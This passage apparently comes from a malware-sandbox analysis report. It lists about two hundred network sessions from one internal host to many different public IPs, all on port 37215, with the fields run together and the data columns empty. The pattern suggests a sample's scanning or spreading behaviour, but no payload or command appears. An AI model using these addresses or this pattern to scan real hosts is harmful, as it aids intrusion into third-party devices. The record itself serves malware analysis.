                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6221192.168.2.1343512197.188.129.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6222192.168.2.1349092157.184.114.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6223192.168.2.1341624158.219.249.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6224192.168.2.135371441.143.33.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6225192.168.2.1337228197.81.253.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6226192.168.2.135569071.126.196.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6227192.168.2.1332970157.68.210.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6228192.168.2.1347402157.238.214.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6229192.168.2.1347204208.14.127.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6230192.168.2.1354024157.168.75.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6231192.168.2.1352826166.120.155.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6232192.168.2.1360868197.247.123.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6233192.168.2.134785061.160.212.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6234192.168.2.1352528197.185.156.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6235192.168.2.1348674105.242.156.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6236192.168.2.133597241.248.221.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6237192.168.2.1357398112.253.215.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6238192.168.2.1344456136.69.180.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6239192.168.2.136037841.42.116.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6240192.168.2.1333274157.247.33.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6241192.168.2.134907441.219.23.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6242192.168.2.1356224197.28.23.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6243192.168.2.1347742197.219.153.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6244192.168.2.1339396157.228.170.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6245192.168.2.135741281.219.121.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6246192.168.2.1344468212.74.29.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6247192.168.2.1347844162.85.23.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6248192.168.2.1340416157.216.124.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6249192.168.2.1337524157.255.218.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6250192.168.2.1344224157.100.252.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6251192.168.2.1335944197.95.3.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6252192.168.2.1335212197.127.175.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6253192.168.2.1356708197.206.113.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6254192.168.2.1360658157.2.104.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6255192.168.2.136033043.73.236.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6256192.168.2.1346554157.183.185.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6257192.168.2.1354904197.85.115.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6258192.168.2.1360328197.157.114.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6259192.168.2.1359856157.205.120.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6260192.168.2.135071041.201.77.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6261192.168.2.1360424206.76.161.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6262192.168.2.1341382157.10.106.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6263192.168.2.1359596157.192.19.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6264192.168.2.1359396157.155.188.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6265192.168.2.1357714157.215.234.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6266192.168.2.1345016197.253.104.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6267192.168.2.133420673.94.38.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6268192.168.2.1334312173.181.175.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6269192.168.2.1358364157.78.117.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6270192.168.2.1356414197.117.176.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6271192.168.2.135765041.17.219.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6272192.168.2.13416969.122.86.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6273192.168.2.1338172157.61.95.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6274192.168.2.135309282.207.117.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6275192.168.2.1360848157.237.110.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6276192.168.2.1333692157.132.16.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6277192.168.2.1347142157.11.132.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6278192.168.2.135830642.147.132.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6279192.168.2.1352706163.99.10.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6280192.168.2.136008641.231.49.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6281192.168.2.1349684205.67.236.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6282192.168.2.1332934157.131.42.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6283192.168.2.133293441.237.238.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6284192.168.2.1341308112.73.197.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6285192.168.2.133626241.13.145.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6286192.168.2.1348292197.13.158.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6287192.168.2.1342726197.121.252.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6288192.168.2.1338554157.241.152.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6289192.168.2.134930841.117.184.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6290192.168.2.134297441.228.226.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6291192.168.2.1349352184.244.86.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6292192.168.2.13384629.100.235.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6293192.168.2.135849641.159.74.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6294192.168.2.134963841.94.233.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6295192.168.2.134786841.71.80.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6296192.168.2.1343676133.79.203.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6297192.168.2.1350056197.63.45.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6298192.168.2.1349122157.6.181.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6299192.168.2.133556241.129.195.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6300192.168.2.1342502157.129.61.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6301192.168.2.135803841.192.176.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6302192.168.2.1360940216.199.146.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6303192.168.2.135077241.10.198.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6304192.168.2.1336614144.56.166.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6305192.168.2.1353690137.176.195.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6306192.168.2.1339588197.122.81.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6307192.168.2.1352648157.174.24.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6308192.168.2.1333114157.194.153.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6309192.168.2.135146841.90.17.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6310192.168.2.134884284.118.214.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6311192.168.2.1352442157.219.149.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6312192.168.2.133771441.170.105.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6313192.168.2.1339988157.50.12.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6314192.168.2.1343380157.141.164.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6315192.168.2.1358318197.50.131.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6316192.168.2.1351626165.117.136.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6317192.168.2.135971264.93.183.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6318192.168.2.135983064.120.143.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6319192.168.2.1345284197.87.201.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6320192.168.2.1346322197.128.238.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6321192.168.2.1339790197.186.23.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6322192.168.2.1346318197.232.150.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6323192.168.2.135035067.210.233.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6324192.168.2.133563841.78.135.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6325192.168.2.1354660157.229.41.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6326192.168.2.134796241.160.120.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6327192.168.2.1357070157.223.152.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6328192.168.2.1345146157.109.0.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6329192.168.2.135448041.69.239.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6330192.168.2.1334124157.115.140.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6331192.168.2.1353752202.53.117.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6332192.168.2.1350462157.234.162.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6333192.168.2.135045441.96.107.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6334192.168.2.1356812122.237.89.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6335192.168.2.1341382157.53.49.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6336192.168.2.1340718157.70.95.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6337192.168.2.1337930157.10.12.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6338192.168.2.133705241.204.171.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6339192.168.2.1338852157.4.207.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6340192.168.2.1343922157.255.165.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6341192.168.2.133614241.32.78.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6342192.168.2.1351942169.203.245.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6343192.168.2.1350660189.212.148.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6344192.168.2.1343368197.116.18.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6345192.168.2.135748841.123.85.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6346192.168.2.1356598111.118.128.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6347192.168.2.1336318157.213.245.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6348192.168.2.135989041.144.9.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6349192.168.2.1345842201.212.241.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6350192.168.2.1353368197.229.173.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6351192.168.2.1356740157.253.152.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6352192.168.2.133405038.197.33.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6353192.168.2.1358314197.47.47.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6354192.168.2.134855241.253.17.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6355192.168.2.1342758197.120.106.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6356192.168.2.1352156211.22.129.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6357192.168.2.1352362157.241.110.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6358192.168.2.133973841.128.121.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6359192.168.2.1335162197.4.115.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6360192.168.2.1344466197.138.94.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6361192.168.2.1336036157.238.33.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6362192.168.2.136049641.240.84.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6363192.168.2.1342808153.77.68.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6364192.168.2.1358766157.229.77.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6365192.168.2.1350262157.142.28.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6366192.168.2.1343694197.56.70.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6367192.168.2.1343342157.174.108.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6368192.168.2.133289641.40.96.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6369192.168.2.135744641.93.49.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6370192.168.2.1338034157.174.225.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6371192.168.2.1340838157.196.248.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6372192.168.2.1360884157.131.121.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6373192.168.2.1353664191.47.163.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6374192.168.2.1335994101.209.112.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6375192.168.2.1352314157.129.228.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6376192.168.2.1352110197.89.1.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6377192.168.2.135345618.78.100.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6378192.168.2.1355370157.166.62.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6379192.168.2.1343980197.143.115.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6380192.168.2.1337688189.131.86.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6381192.168.2.1350162157.48.202.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6382192.168.2.135414441.173.58.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6383192.168.2.135573441.55.2.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6384192.168.2.13534861.57.76.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6385192.168.2.1355098157.0.115.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6386192.168.2.133851641.220.94.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6387192.168.2.134323841.237.45.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6388192.168.2.1349472148.161.172.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6389192.168.2.1341198170.72.101.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6390192.168.2.134098618.209.123.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6391192.168.2.1345460197.134.0.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6392192.168.2.1360514197.141.73.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6393192.168.2.1337698197.56.191.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6394192.168.2.133314223.238.249.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6395192.168.2.1350280197.52.60.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6396192.168.2.135871641.59.105.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6397192.168.2.135096041.168.41.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6398192.168.2.135335261.36.172.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6399192.168.2.1355670197.224.236.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6400192.168.2.133506224.90.176.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6401192.168.2.1342284116.142.207.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6402192.168.2.134275841.87.128.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6403192.168.2.1334580135.239.126.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6404192.168.2.135073441.234.119.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6405192.168.2.1356680197.82.131.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6406192.168.2.1357196206.145.223.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6407192.168.2.1334352157.168.254.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6408192.168.2.1350384218.122.233.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6409192.168.2.1355066197.38.153.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6410192.168.2.134216480.90.63.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6411192.168.2.1339946157.59.100.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6412192.168.2.1339534139.234.76.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6413192.168.2.1341276157.27.112.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6414192.168.2.1348868157.56.105.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6415192.168.2.1352072197.236.248.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6416192.168.2.1354618197.226.146.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6417192.168.2.135701241.57.100.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6418192.168.2.1345770197.42.231.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6419192.168.2.1342548197.146.20.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6420192.168.2.1341442197.19.134.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6421192.168.2.136050423.40.233.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6422192.168.2.1358960197.249.238.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6423192.168.2.134593441.4.153.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6424192.168.2.134327841.196.66.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6425192.168.2.135201041.180.97.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6426192.168.2.134785441.93.43.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6427192.168.2.1348358124.8.140.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6428192.168.2.1343882197.34.9.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6429192.168.2.133660041.144.168.14837215
                                                  TimestampBytes transferredDirectionData


